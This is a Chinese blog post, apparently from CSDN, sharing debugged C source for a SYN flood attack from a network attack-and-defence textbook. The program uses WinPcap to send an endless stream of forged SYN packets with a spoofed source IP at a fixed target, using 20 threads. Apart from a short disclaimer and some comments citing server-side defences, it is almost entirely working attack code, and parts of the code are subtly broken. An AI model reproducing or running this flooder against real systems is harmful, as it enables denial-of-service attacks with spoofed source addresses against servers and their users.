SYN洪泛攻击(网络攻防原理与技术)

第一次写博客,因为在调试那本书的代码的时候碰到很多问题,感谢CSDN的帮助,现在准备把调试好了的源码发出来给学弟学妹们分享,也供大家交流学习,本人很菜,如有问题,请多指正。

本段代码仅限于研究学习,禁止用于破坏活动;对于由此出现的安全问题,本人概不负责!

运行环境:VS2013、WinPcap

 

#define WIN32_LEAN_AND_AND_MEAN
#define _WSPIAPI_COUNTOF

#include
#include
#include
#include
#include
#include

#pragma comment(lib,"ws2_32.lib")
#pragma comment(lib, "wpcap.lib")
#pragma comment(lib, "packet.lib")

// Number of worker threads main() starts for each address entry of the chosen adapter.
#define MAXTHREAD  20
// NDIS OID that GetSelfMac passes to PacketRequest to read the adapter's current MAC address.
#define OID_802_3_CURRENT_ADDRESS  0x01010102
// Number of elements in the option array at the end of TCP_HEADER.
#define OPTION_LENTH  6

// All addressing is fixed at compile time; both IPs are in the RFC 1918 private range.
#define SYN_DEST_IP        "192.168.0.22"// destination (target) IP
#define SYN_DEST_PORT      80// destination (target) port
#define FAKE_IP            "192.168.0.11"// IP address placed in the source field
#define FAKE_MAC           "\xB8\xAC\x6F\x1F\x26\xF6"// MAC constant; main() copies it into PARAMETERS.dstmac
// Structure packing must be 1 byte so the headers are laid out without padding.
// NOTE(review): the per-field comments below are translations of the author's
// labels and describe intent only; confirm sizes against the declarations.
#pragma pack(1)
typedef struct et_header // Ethernet header
{
	unsigned chareh_dst[6];// destination MAC
	unsigned chareh_src[6];// source MAC
	unsigned shorteh_type;// upper-layer protocol type
}ET_HEADER;

typedef struct ip_hdr // IP header
{
	unsigned charh_verlen;// version and header length
	unsigned chartos;// type of service
	unsigned shorttotal_len;// total length
	unsigned shortident;// identification
	unsigned shortfrag_and_flags;// 3-bit flags and 13-bit fragment offset
	unsigned charttl;// time to live
	unsigned charproto;// protocol
	unsigned shortchecksum;// header checksum
	unsigned intsourceIP;// source IP
	unsigned intdestIP;// destination IP
}IP_HEADER;
typedef struct tcp_hdr // TCP header
{
	unsigned shortth_sport;// 16-bit source port
	unsigned shortth_dport;// 16-bit destination port
	unsigned intth_seq;// 32-bit sequence number
	unsigned intth_ack;// 32-bit acknowledgement number
	unsigned shortth_data_flag;// 16-bit flags field
	unsigned short_win;// 16-bit window size
	unsigned short_sum;// 16-bit checksum
	unsigned short_urp;// 16-bit urgent pointer
	unsigned intoption[OPTION_LENTH];// option words, filled with constants by BuildSYNPacket
}TCP_HEADER;
typedef struct psd_hdr // TCP pseudo-header, used only as checksum input
{
	unsigned long saddr;// source address
	unsigned long daddr;// destination address
	char mbz;// set to 0 by BuildSYNPacket
	char ptcl;// protocol type
	unsigned shorttcpl;// TCP length
}PSD_HEADER;
typedef struct _SYN_PACKET // complete frame handed to pcap_sendpacket
{
	ET_HEADER  eth;// Ethernet header
	IP_HEADER  ph;// IP header (the original comment called this the ARP packet header)
	TCP_HEADER tcph;// TCP header
}SYN_PACKET;
#pragma pack()
// Per-thread argument block: main() fills one instance and every SYNFloodThread
// copies it by value on entry.
typedef struct _PARAMETERS
{
	unsigned int srcIP;        // source IP for generated packets; main() sets it from FAKE_IP
	unsigned int dstIP;        // destination IP; main() sets it from SYN_DEST_IP
	unsigned short dstPort;    // destination TCP port; main() sets it from SYN_DEST_PORT
	unsigned char* srcmac;     // pointer returned by GetSelfMac (its static buffer, or NULL on failure)
	unsigned char dstmac[6];   // six bytes copied from FAKE_MAC in main()
	pcap_t*       adhandle;    // adapter handle from pcap_open_live, shared by all threads
}PARAMETERS, *LPPARAMETERS;
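//******************** Read the adapter's MAC address ********************//
// Opens the named adapter through the Packet.dll API, issues an
// OID_802_3_CURRENT_ADDRESS query and copies the 6-byte answer into a
// function-local static buffer.
//
// pDevName: adapter name as accepted by PacketOpenAdapter.
// Returns:  pointer to the static 6-byte buffer (shared by all callers and
//           overwritten on every call; do not free it), or NULL when the
//           adapter cannot be opened or the request buffer cannot be
//           allocated. If PacketRequest itself fails the buffer is returned
//           zero-filled.
unsigned char* GetSelfMac(char* pDevName)
{
	static u_char mac[6];
	memset(mac, 0, sizeof(mac));
	LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);
	if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
	{
		return NULL;
	}

	// Size the request from the structure the pointer refers to. The previous
	// expression used sizeof on the pointer typedef, which allocates only a
	// pointer's worth of header; on a 32-bit build the 6-byte write into
	// Data[] then runs past the end of the heap block.
	PPACKET_OID_DATA OidData =
		(PPACKET_OID_DATA)malloc(sizeof(*OidData) + sizeof(mac));
	if (OidData == NULL)
	{
		PacketCloseAdapter(lpAdapter);
		return NULL;
	}

	OidData->Oid = OID_802_3_CURRENT_ADDRESS; // the author marked this OID value as "not sure"
	OidData->Length = sizeof(mac);
	memset(OidData->Data, 0, sizeof(mac));
	// FALSE selects a query (read) rather than a set operation.
	BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
	if (Status)
	{
		memcpy(mac, (u_char*)(OidData->Data), sizeof(mac));
	}
	free(OidData);
	PacketCloseAdapter(lpAdapter);
	return mac;
}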

// One's-complement checksum: sums the buffer as 16-bit words (plus one
// trailing byte when a byte is left over), folds the carries back into the
// low 16 bits and returns the bitwise complement.
//
// buffer: start of the data, read as unsigned short words.
// size:   length of the data in bytes.
unsigned short CheckSum(unsigned short * buffer, int size)
{
	unsigned long sum = 0;
	const unsigned short *word = buffer;
	int remaining = size;

	// Consume whole 16-bit words.
	for (; remaining > 1; remaining -= (int)sizeof(unsigned short))
	{
		sum += *word;
		++word;
	}

	// A leftover byte is added as-is.
	if (remaining != 0)
	{
		sum += *(const unsigned char *)word;
	}

	// Fold the carry bits into the low word, twice, then complement.
	unsigned long folded = (sum & 0xffff) + (sum >> 16);
	folded += (folded >> 16);

	return (unsigned short)(~folded);
}
// Fills in one SYN_PACKET (Ethernet + IP + TCP headers, no payload).
// (The original comment said "build ARP request packet"; the function builds a TCP frame.)
//
// packet:     output structure, written in place.
// source_mac: 6 bytes copied into the Ethernet source field.
// dest_mac:   6 bytes copied into the Ethernet destination field.
// srcIp:      value stored as IP source and pseudo-header source address.
// destIp:     value stored as IP destination.
// dstPort:    destination TCP port, host byte order (converted with htons here).
//
// Apart from the two rand()-derived fields (source port and sequence number),
// every value assigned here is the same on each call, so the frames a caller
// produces with fixed arguments differ only in those two fields.
void BuildSYNPacket(SYN_PACKET &packet,
	unsigned char * source_mac,
	unsigned char * dest_mac,
	unsigned long srcIp,
	unsigned long destIp,
	unsigned short dstPort)
{
	PSD_HEADER PsdHeader;
	// Ethernet header
	memcpy(packet.eth.chareh_dst,dest_mac,6);
	memcpy(packet.eth.chareh_src,source_mac, 6);
	packet.eth.shorteh_type = htons(0x0800);// 0x0800 is the EtherType for IPv4 (the original comment called it ARP)
	// IP header
	packet.ph.charh_verlen = 0;
	packet.ph.charh_verlen = ((4 << 4) | sizeof(IP_HEADER) / sizeof(unsigned int));
	packet.ph.chartos = 0;
	packet.ph.shorttotal_len = htons(sizeof(IP_HEADER) + sizeof(TCP_HEADER));
	packet.ph.shortident = 1;
	packet.ph.shortfrag_and_flags = htons(1 << 14);
	packet.ph.charttl = 128;
	packet.ph.charh_verlen = IPPROTO_TCP;
	packet.ph.shortchecksum = 0;
	packet.ph.intsourceIP = srcIp;
	packet.ph.intdestIP = destIp;
	// TCP header
	packet.tcph.shortth_sport = htons(rand() % 60000 + 1024);
	packet.tcph.shortth_dport = htons(dstPort);
	packet.tcph.intth_seq = htonl(rand() % 90000000 + 100000);
	packet.tcph.intth_ack = 0;
	packet.tcph.shortth_data_flag = 0;
	// Header-length and flag bits packed into one value, stored without htons.
	// NOTE(review): presumably relies on a little-endian host - confirm.
	packet.tcph.shortth_data_flag = (11 << 4 | 2 << 8);
	packet.tcph.short_win = htons(512);
	packet.tcph.short_sum = 0;
	packet.tcph.short_urp = 0;
	// Six constant option words, identical in every packet.
	packet.tcph.intoption [0] = htonl(0X020405B4);
	packet.tcph.intoption[1] = htonl(0x01030303);
	packet.tcph.intoption[2] = htonl(0x0101080A);
	packet.tcph.intoption[3] = htonl(0x00000000);
	packet.tcph.intoption[4] = htonl(0X00000000);
	packet.tcph.intoption[5] = htonl(0X01010402);
		// Build the pseudo-header used as checksum input
		PsdHeader.saddr = srcIp;
	    PsdHeader.daddr = packet.ph.intdestIP;
	    PsdHeader.mbz = 0;
	    PsdHeader.ptcl= IPPROTO_TCP;
	    PsdHeader.shorttcpl = htons(sizeof(TCP_HEADER));


	// TCP checksum: computed over pseudo-header followed by the TCP header,
	// with the checksum field still zero.
	BYTE Buffer[sizeof(PsdHeader) + sizeof(TCP_HEADER)] = { 0 };
	memcpy(Buffer, &PsdHeader, sizeof(PsdHeader));
	memcpy(Buffer + sizeof(PsdHeader), &packet.tcph, sizeof(TCP_HEADER));
	packet.tcph.short_sum = CheckSum((unsigned short *)Buffer,
		sizeof(PsdHeader) + sizeof(TCP_HEADER));

	// IP header checksum: the scratch buffer is reused for a copy of the IP header.
	memset(Buffer, 0, sizeof(Buffer));
	memcpy(Buffer, &packet.ph, sizeof(IP_HEADER));
	packet.ph.shortchecksum = CheckSum((unsigned short *)Buffer, sizeof(IP_HEADER));

	return;
}
// Packet-sending thread entry point.
//
// Ip: pointer to a PARAMETERS block; it is copied by value on entry, so the
//     thread keeps its own copy of the addresses and the shared pcap handle.
//
// After a 10 ms sleep the thread loops forever: build one SYN_PACKET, hand it
// to pcap_sendpacket, log to stderr on failure. There is no pacing, no exit
// condition and no back-off after a send error, so the trailing return is
// never reached and the thread ends only when the process does.
//
// Defensive context: RFC 4987 ("TCP SYN Flooding Attacks and Common
// Mitigations") covers the server-side defences against this traffic pattern -
// SYN cookies, SYN cache, backlog sizing and shorter SYN-RECEIVED timers - and
// RFC 2827 / BCP 38 ingress filtering addresses spoofed source addresses at the
// network edge.
DWORD WINAPI SYNFloodThread(LPVOID Ip)
{
	PARAMETERS param;
	param = *((LPPARAMETERS)Ip);
	Sleep(10);
	while (true)
	{
		SYN_PACKET packet;
		BuildSYNPacket(packet,param.srcmac, param.dstmac,
			param.srcIP, param.dstIP, param.dstPort/*shortstPort*/);
		if (pcap_sendpacket(param.adhandle,
			(const unsigned char*)&packet,
			sizeof(packet)) == -1)
		{
			fprintf(stderr, "pacp_sendpacket error.\n");
		}
	}
	return 1;
}
//*************************** Main function *****************************//
// Interactive driver: converts the compile-time FAKE_IP / SYN_DEST_IP /
// SYN_DEST_PORT values, lists the pcap adapters, reads an adapter number from
// stdin, opens that adapter, starts SYNFloodThread workers and then waits for
// 'q' or 'Q' on stdin.
//
// argc/argv are not used; all addressing is fixed at build time.
// Returns 0 after the quit key and -1 on a validation or adapter error; calls
// exit(1) if pcap_findalldevs fails.
int main(const int argc,const char* argv[])
{
	unsigned long fakeIp = inet_addr(FAKE_IP);// IP address to impersonate
	if (fakeIp == INADDR_NONE)
	{
		fprintf(stderr, " Invalid IP;%s\n", FAKE_IP);
		return -1;
	}
	unsigned long destIp = inet_addr(SYN_DEST_IP);// destination IP
	if (destIp == INADDR_NONE)
	{
		fprintf(stderr, " Invalid IP:%s\n", SYN_DEST_IP);
		return -1;
	}
	unsigned short dstPort = SYN_DEST_PORT;// destination port
	// NOTE(review): dstPort is an unsigned short, so neither comparison can be true.
	if (dstPort <0 || dstPort > 65535)
	{
		fprintf(stderr, " Invalid Port:% d\n", SYN_DEST_PORT);
		return -1;
	}
	pcap_if_t * alldevs;// list of all adapters
	pcap_if_t*d;  // one adapter
	pcap_addr_t * pAddr;// adapter address entry
	char errbuf[PCAP_ERRBUF_SIZE];// error buffer
	if (pcap_findalldevs(&alldevs, errbuf) == -1)// enumerate local adapters
	{
		fprintf(stderr, " Error in pcap_findalldevs:% s\n", errbuf);
		exit(1);
	}
	// Print a numbered list of adapters; i ends up as the adapter count.
	int i = 0;
	for (d = alldevs; d; d = d->next)
	{
		printf("%d",++i);
		if (d->description)
			printf(". %s、n" ,d->description);
		else
			printf(". No desription avilable");
	}
	if (i == 0)
	{
		fprintf(stderr,"\nNo interfaces found! \n");
		return -1;
	}
	printf(" Enter the interface number (1 -%d):", i);

	int inum;// adapter number chosen by the user
	scanf_s(" % d", &inum);
	if (inum<1 || inum >i)
	{
		printf(" InInterface number out of range. \n");
		pcap_freealldevs (alldevs);
		return -1;
	}

	HANDLE threadhandle[MAXTHREAD];
	PARAMETERS param;// thread parameter block
	memcpy(param.dstmac, FAKE_MAC, 6);// FAKE_MAC becomes the frame's destination MAC
	param.dstIP = destIp;
	param.srcIP = fakeIp;
	param.dstPort = dstPort;
	// Walk the list to the adapter the user selected
	for (d = alldevs, i = 0; i< inum - 1; d = d->next, i++);
	// The Ethernet source is the adapter's own MAC while the IP source is FAKE_IP.
	// NOTE(review): GetSelfMac can return NULL; the result is dereferenced below without a check.
	param.srcmac = GetSelfMac(d->name);
	printf(" 发送SYN包,本机(%.2X-%.2X- %.2X-%.2X-%.2X- %.2X)试图伪装成%s/n",
	    param.srcmac[0],
		param.srcmac[1],
		param.srcmac[2],
		param.srcmac[3],
		param.srcmac[4],
		param.srcmac[5],  FAKE_IP);
		if ((param.adhandle = pcap_open_live(d->name, 65536, 0, 1000, errbuf)) == NULL)
		{
		fprintf(stderr, " \nUnable to open adapter.\n");
		pcap_freealldevs(alldevs);
		return -1;
		}
	// One pass per address entry of the selected adapter; each pass starts
	// MAXTHREAD threads and reuses the same threadhandle[] slots.
	pAddr = d->addresses;
	while (pAddr)
	{
		// Create the worker threads
		for (int i = 0; i < MAXTHREAD; i++)
		{
			threadhandle[i] =
				CreateThread(NULL, 0, SYNFloodThread ,(void *)¶m, 0, NULL);
			// NOTE(review): this tests the array itself, not threadhandle[i],
			// so a failed CreateThread is never reported.
			if (!threadhandle)
			{
				printf("CreateThread eror:% d\n", GetLastError());
			}

			Sleep(100);
		}
		pAddr = pAddr->next;
	}
	// Block until the user types q or Q. The thread handles, the pcap handle
	// and the adapter list are not released on this path; returning from main
	// ends the process and with it the worker threads.
	printf("退出请输入q或者Q! \n");
	char cQuit;
	do {

		cQuit = getchar();
	} while (cQuit != 'q'&& cQuit != 'Q');
	return 0;
}

 
